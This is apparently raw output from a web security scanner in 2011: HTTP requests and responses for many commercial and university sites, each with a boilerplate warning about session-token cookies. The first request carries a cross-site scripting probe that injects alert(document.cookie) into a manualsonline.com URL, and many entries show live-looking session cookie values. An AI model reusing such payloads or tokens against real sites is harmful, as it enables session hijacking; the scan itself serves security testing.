GET /regman/mem/initsession?sessionargs=YToyOntzOjM6InVyaSI7czoxMTQ6Ii9leC9tZmcvaGVhZGxpbmUvbS9hcmllbnM0Nzg4OCUyNTI3JTI1M2JhbGVydCUyNTI4ZG9jdW1lbnQuY29va2llJTI1MjklMjUyZiUyNTJmOGZjZjE2N2QyODEvZC90eXBlL3Byb2R1Y3RfcHJvYmxlbSI7czo2OiJzZXJ2ZXIiO3M6MzE6ImhvbWVhcHBsaWFuY2UubWFudWFsc29ubGluZS5jb20iO30, HTTP/1.1 Host: session.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/articles/intel-cloud-builders/?cid\u003dvibrantlogo4 HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sites/oss/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /t/v1/clk HTTP/1.1 Host: t.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="/t/v1/clk/cc">here</a>.</p> <hr> <address>Apach ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:25 GMT Server: Server Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sat, 05-Feb-2011 23:01:25 GMT x-amz-id-1: 0KCJW8RY05PKJVC74BS4 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: ZOHvQ9RGUMwBOJTa2KvnRusGxeBk9Xx5NIoqKO+M/pseIEcTTQSnTJ7z6CUtyShJ Vary: Accept-Encoding,User-Agent nnCoection: close Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=188-9552736-3777102; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 131368
<html> <head>
<style type="text/css"><!--
BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.box.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.coe.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 ETag: "cd5e8abd80fd03f2c8d32b33e06270c9" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Set-Cookie: SESSe21231bc09705de79a97f2d6b2e890fb=645k56n5kokbe2trg1b1r6h6e7; expires=Tue, 01-Mar-2011 01:27:06 GMT; path=/; domain=.coe.gatech.edu Last-Modified: Fri, 04 Feb 2011 19:45:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.diigo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:01:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Tue, 01 Feb 2011 19:01:42 GMT Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Tue, 01 Feb 2011 19:01:42 GMT Set-Cookie: _smasher_session=0884043c57a485ce4cbb73416ccb308f; domain=diigo.com; path=/ ETag: "152b87fdda438c461169e0c57ed9939c" P3P: CP="NOI DEVa TAIa OUR BUS UNI" X-Runtime: 0.00139 Content-Length: 9244 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.dooce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:01:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11 X-Powered-By: PHP/5.2.11 Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=71f18f11fd684daf83cd39428a8d9146; expires=Tue, 01-Mar-2011 19:35:09 GMT; path=/; domain=.dooce.com Last-Modified: Sun, 06 Feb 2011 16:01:49 GMT ETag: "0493be742911f37fbd142739098641b2" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.gpg.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:06:39 GMT Server: Apache Set-Cookie: SESS4f8b8e940bd1b5592aec2833218c244b=juq455no7avf4ohoeb33ho2n46; expires=Tue, 01-Mar-2011 01:39:59 GMT; path=/; domain=.gpg.org Last-Modified: Sat, 05 Feb 2011 22:06:39 GMT ETag: "92cf80f6e0d2cd5989936c5e23a89fff" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.hyves.nl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogview/5213-Splunk-4-Users-Review.html HTTP/1.1 Host: www.infosecisland.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:05:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Set-Cookie: wiredheadSessions=1a19e483b416036c9111676e1b941b50; path=/; domain=.infosecisland.com; secure; HttpOnly Expires: Sat, 12 Feb 2011 23:05:24 GMT Cache-Control: max-age=604800 Pragma: no-cache Content-Length: 39150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy.html HTTP/1.1 Host: www.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tc.html HTTP/1.1 Host: www.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:48 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en Set-Cookie: PHPSESSID=os9t2670j382p7k3kipnt47et6; path=/; domain=.mylinkvault.com Vary: Accept-Encoding Content-Length: 12638 Connection: close Content-Type: text/html; charset=utf-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /content/information-security/ HTTP/1.1 Host: www.oit.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /service/software-distribution/software-distribution HTTP/1.1 Host: www.oit.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:07:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.10 ZendServer/4.0 Set-Cookie: SESS701e63468b7538f49a91969758042315=m62ul61cvi1ckhdg53u2dh1e65; expires=Tue, 01-Mar-2011 01:40:32 GMT; path=/; domain=.oit.gatech.edu Last-Modified: Sat, 05 Feb 2011 09:15:23 GMT ETag: "b0c4a17612c3bdb20d870d94e5608032" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pdfforge.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:09:17 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.7 Set-Cookie: SESSc75490b6e05df4b955c54eec3097373b=o8ot6jt3lo29pi8jckb7f0fjc2; expires=Tue, 01-Mar-2011 01:42:37 GMT; path=/; domain=.pdfforge.org Last-Modified: Sat, 05 Feb 2011 22:05:03 GMT ETag: "ff0ffe33d43c31cea41ae173d1fb80bd" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <me ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pusha.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php/view HTTP/1.1 Host: www.sulit.com.ph Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 05 Feb 2011 22:19:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: SESSION_ID=irtoo98lni0bfkq9vmg49fn8t3; path=/; domain=.sulit.com.ph Location: http://www.sulit.com.ph/index.php/page+not+found Content-Length: 0
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.walmart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head> <title> - Walmart</title> <link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.webnews.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ca.gif?rb=233&ca=20472701&ct=728106282%20height=0%20width=0%20style= HTTP/1.1 Host: a.rfihub.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: m="aABseW9eg==AI20472701AAABLevCTs8="; f="aABZd22cg==AK1296740536AB1AAABLevCTs4="; a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; e=cd; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014
Response
HTTP/1.1 302 Found P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: m="aACjOGo3g==AI20472701AAABLffNWaU=AI20472701AAABLevCTs8=";Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Set-Cookie: f="aAC5a_jbQ==AK1296942586AB1AAABLffNWaQ=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 06-Aug-12 21:49:46 GMT Cache-Control: no-cache Location: http://ib.adnxs.com/seg?add=56500&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D966993%26t%3D2%26piggyback%3Dhttp%253A%252F%252Fwww.googleadservices.com%252Fpagead%252Fconversion%252F1030878771%252F%253Flabel%253DwJh2CPel9gEQs-zH6wM%2526amp%253Bguid%253DON%2526amp%253Bscript%253D0 Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i.cid?c=333063&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=arngjUNZai9A8b6vGqfDNi6rJ1IOrwG1iRfb2mun6UWAcfaZaM71VvOPKvNWAPmPZbMhDIZagUZcZcZdPiDFoZbRXgORrSVcupCRtGZcb2O5dVNPgBgKgCWi9KYAIaErmMnc2YBh9d5ihJseWviuvM0msClZcLSafio3eePFSgZcrofvZdGZcHHY27INY2qQvgOwWk7yqlLnc5J8LvggklYNxxOl7xVwF2ZdCZcHfkIZcTPAGv9LW7cuti18ri2G5nmglac3HHOZcBjfcvaUYbKOYGgRcpLWa5or6KOP9GIVZcEb69ZdZaZaKck6r7q8Zc424boVpx39LS8GTPY086n39wF7XS6BqCG43UqZcBvuiEjBBZaZbpmCZcIA404LZadCp79y6sNyLtllvmxwrJ7ZdvKyn3G0uRMswjtmF2pGQr4eTvVNTWZcAMncJfaLWO6jMPphRt0wQLgSaCbjZc4XaEZcl6WDUXVtosBTptyXFjtZcuPA
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=3013 HTTP/1.1 Host: action.media6degrees.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11txepxzt11txepxzt11o9ct; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1txep00y10010606205; orblb=2lfk1rn0225810u010hlmv2dh10u0100000; rdrlst=41407dpletz4d0000000u10010o2ylebnns0000000y10010mmnlebnns0000000y100110e5lg1nei00000004100110rdlg1vir0000000310010xo1lebnns0000000y10010x1blebnns0000000y10010eh5lf17qf0000000q100106bylemlne0000000w10010w3clebnns0000000y100107gmlebnns0000000y10010jv6lebnns0000000y10010j4ilew2e20000000s10010xthlebnns0000000y10010fullf8gij0000000m100110f6lg1nei0000000410011196lfzx0l00000005100100c9lfk1rn0000000j10010jillebnns0000000y10011194lg3y5y0000000210010fuqlegh2b0000000x10010b6mlf17qk0000000p10010mz1lebnns0000000y10010cajlfk1rn0000000j10010p7vlebnns0000000y100107vglfk1rn0000000j10011192lg5l2h0000000110010xvslebnns0000000y100110ellg1nei0000000410010xuklebnns0000000y10010x1jlebnns0000000y10010jk7lebnns0000000y10010cbnlfk1rn0000000j10010yiplebnns0000000y10010yh0lebnns0000000y10010xwflebnns0000000y10010e4vlebnns0000000y100110e9lg1nei0000000410010jwblfk1rn0000000j10010xwblebnns0000000y1001; sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo0000000o10010606205ag2leqh191f41800v1001060620582gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns1o9ct00y100106062055q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300k10010606205820lebnns181qq00e0l000400100b0olfjpei0g7m300k10010606205ab4lebnns1o9ct00y100106062059szlebnns1o9ct00y100106062058wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1p40600x10010606205al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns1o9ct00j100106052057y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei0g7m300k10010606205b08lfjpei0g7m300k1001060620540slebnns181qq00e0l00040010045mlfdxmc0000000l10010606205a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; vstcnt=3lebnns031l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4fhux122u000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru000000000000000000000000000000000004esx7120104tej0r023ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l1o018EstvP2qn112s1o9ct1oa791oa5w1oa8b1oa601oa8j1oa6z1oa871oa6u1oa8f1oa7b1oa7l1oa6x1oa8l1oa6m1oa7i1oa8h1oa6h1oa8e1oa5z1oa8s1oa7n1oa6e1oa7k1oa741oa5r1oa7h1oa5l1oa5k1oa611oa7w1oa8g1oa911oa7o1oa5m1oa6l1oa681oa8c1oa5h1oa831oa8o1oa8n1oa7f1oa6f1oa7x1oa721oa771oa701oa7j1oa7a1oa801oa7g1oa6n1oa761oa5t1oa8i1oa841oa8t1oa8m1oa7y1oa921oa5i1oa6y1oa931oa821oa7u1oa941oa8d1oa631oa6t1oa651oa7d1oa8v1oa6j1oa891oa6w1oa5j1oa881oa7t1oa6v1oa7s1oa8z1oa8p1oa811oa6o1oa8u1oa691oa731oa5q1oa6g1oa8q1oa7e1oa5y1oa751oa5s1oa641oa7v1oa781oa5v1oa6k
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: clid=2lebnns011706ch47d7o8wtv1ubnn00z10020607206; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: orblb=2lfk1rn0225810u020lxjs0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 21:50:03 GMT; Path=/ Set-Cookie: 